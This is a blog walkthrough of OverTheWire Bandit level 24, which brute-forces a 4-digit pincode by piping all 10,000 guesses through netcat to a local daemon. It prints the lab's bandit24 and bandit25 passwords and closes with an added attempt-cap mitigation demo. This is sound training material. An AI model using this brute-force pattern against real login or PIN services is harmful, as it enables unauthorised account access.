MayADevBe Blog

A Blog about Computer Science

OverTheWire Bandit Level 24 -> 25 - Walkthrough


Login

SSH: ssh bandit24@bandit.labs.overthewire.org -p 2220

Password: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Task

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

A little bit of Theory

In this level, we need the theory from previous levels, namely grep (Level 6), netcat (Level 15/Level 21), and bash scripting basics.

A for-loop in bash has the following syntax:

for var in 1 2 ... N
do
	#something
done

If the variable is looped over a specific range, it is easier to write only the bounds. For example, if we want to loop over 0-10, the syntax would be {0..10}. If we additionally want every number to have two digits (00, 01, 02, … 10), we can pad the bounds with a leading zero: {00..10}.

Solution

First, I connected to the port with netcat to see the script and its response.

bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
Wrong! Please enter the correct pincode. Try again.

We see that when we send the wrong pincode, we get a one-line response. This is important for later.

Since brute-forcing the pincode by hand would be quite annoying, I wrote a script to do it for me:

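#!/bin/bash

# Part 1: append every "password pincode" candidate (0000-9999) to a file
for i in {0000..9999}
do
        echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> possibilities.txt
done

# Part 2: send all candidates over one connection and save the responses
cat possibilities.txt | nc localhost 30002 > result.txt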

As you can see, the script is divided into two parts. First, I used a for loop over all possible pincodes. Each possibility is appended to a file called ‘possibilities.txt’. In the second part, the possibilities are sent to the daemon. The output is saved in a file called ‘result.txt’.

Now that the script is written, we need to save it. I created a folder and saved the script in it (remember to make it executable).

bandit24@bandit:~$ mktemp -d
/tmp/tmp.3YQNHtW1Uu
bandit24@bandit:~$ cd /tmp/tmp.3YQNHtW1Uu
bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ nano brute_force_pin.sh
bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ chmod +x brute_force_pin.sh

Next, we need to run the script. After running the script, we can check if it worked by making sure the two files are created.

bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ ./brute_force_pin.sh 
bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ ls
brute_force_pin.sh  possibilities.txt  result.txt

The result file contains the daemon's responses to every pincode possibility we sent through netcat. So now we only need to find the response for the correct pincode. We can do this with what we learned from the first manual run: we use grep -v to drop all lines containing ‘Wrong! Please enter the correct pincode. Try again.’ (filtering for the word ‘Wrong’ is also enough). As a result, only the intro and the lines produced by the correct pincode should be returned.

bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ sort result.txt | grep -v "Wrong!"

Correct!
Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
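
The brute force above only works because the daemon answers all 10000 guesses on a single connection. As an added example (not the Bandit daemon's code and not part of the original post), the script below is a line-based checker with a per-connection attempt cap, fed the same kind of candidate list. The password EXAMPLE_PASSWORD, the pincode 4821, the closing message and all function names are constructed assumptions.

```bash
#!/bin/bash
# Added example: a pincode checker that speaks the same "password pincode"
# line protocol as the walkthrough, but closes after too many wrong guesses.
# All values here are constructed; this is not the real daemon.

# pin_checker PASSWORD PINCODE MAX_ATTEMPTS  (reads guesses from stdin)
pin_checker() {
    local expected_pw=$1 expected_pin=$2 max_attempts=$3
    local attempts=0 pw pin
    echo "I am the pincode checker. Enter password and pincode on one line."
    while IFS=' ' read -r pw pin; do
        if [ "$pw" = "$expected_pw" ] && [ "$pin" = "$expected_pin" ]; then
            echo "Correct!"
            return 0
        fi
        attempts=$((attempts + 1))
        # Mitigation: stop answering once the cap is reached.
        if [ "$attempts" -ge "$max_attempts" ]; then
            echo "Too many wrong attempts. Closing connection."
            return 1
        fi
        echo "Wrong! Please enter the correct pincode. Try again."
    done
    return 1
}

# candidates PASSWORD: every "password pincode" line from 0000 to 9999,
# the same content the walkthrough stores in possibilities.txt.
candidates() {
    awk -v pw="$1" 'BEGIN { for (i = 0; i < 10000; i++) printf "%s %04d\n", pw, i }'
}

# run_trial MAX_ATTEMPTS: pipe the full candidate list into the checker.
run_trial() {
    candidates "EXAMPLE_PASSWORD" | pin_checker "EXAMPLE_PASSWORD" "4821" "$1"
}

# Demo: last response line without an effective cap, then with a cap of 3.
run_trial 10000 | tail -n 1
run_trial 3 | tail -n 1
```

With a cap of 3 the checker stops after the third wrong guess, so a single piped list no longer reaches the correct pincode. A real service would also need to limit attempts across reconnects, not only per connection.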

https://overthewire.org/wargames/bandit/bandit25.html

